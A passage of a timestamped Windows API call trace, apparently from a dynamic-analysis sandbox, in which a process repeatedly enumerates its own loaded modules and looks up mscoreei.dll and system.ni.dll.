lpmodinfo=0x18eba0*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.553] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.554] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.554] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.555] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.555] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.556] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74f10000, lpBaseName=0x18e998, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0216.561] GetCurrentProcess () returned 0xffffffff [0216.561] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d98c, cb=0x1000, lpcbNeeded=0x18eba0 | out: lphModule=0x18d98c, lpcbNeeded=0x18eba0) returned 1 [0216.562] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.562] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.562] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.562] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.563] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.563] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.563] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.563] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.563] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.563] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.564] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.564] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.564] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.565] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.565] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.565] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.565] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.566] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.566] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.567] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.567] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.567] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.568] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.568] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.569] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.569] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.570] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.570] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.571] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.571] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.572] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.572] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.573] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.574] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74f10000, lpBaseName=0x18e98c, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0216.574] GetCurrentProcess () returned 0xffffffff [0216.574] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d998, cb=0x1000, lpcbNeeded=0x18ebac | out: lphModule=0x18d998, lpcbNeeded=0x18ebac) returned 1 [0216.575] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.575] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.575] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.575] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.575] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.576] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.576] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.576] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.576] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.576] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.577] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.577] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.577] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.577] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.578] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.578] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.578] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.579] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.579] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.579] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.580] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.580] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.581] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.581] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.581] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.582] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.582] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.583] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.583] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.584] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.584] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.585] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.586] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.586] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74f10000, lpBaseName=0x18e998, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0216.590] GetCurrentProcess () returned 0xffffffff [0216.590] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d9b4, cb=0x1000, lpcbNeeded=0x18ebc8 | out: lphModule=0x18d9b4, lpcbNeeded=0x18ebc8) returned 1 [0216.590] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.590] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.590] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.591] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.591] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.591] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.591] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.591] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.591] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.592] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.592] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.592] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.592] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.593] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.593] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.593] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.594] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.594] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.594] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.595] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.595] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.595] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.596] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.596] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.597] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.597] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.598] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.598] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.599] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.599] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.600] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.600] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.601] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.601] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74f10000, lpBaseName=0x18e9b4, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0216.605] StrStrIW (lpFirst="api-ms-win-appmodel-runtime-l1-1-0.dll", lpSrch="\\system.ni.dll") returned 0x0 [0216.609] GetCurrentProcess () returned 0xffffffff [0216.609] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d7b4, cb=0x1000, lpcbNeeded=0x18e9c8 | out: lphModule=0x18d7b4, lpcbNeeded=0x18e9c8) returned 1 [0216.609] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.609] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.609] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.610] 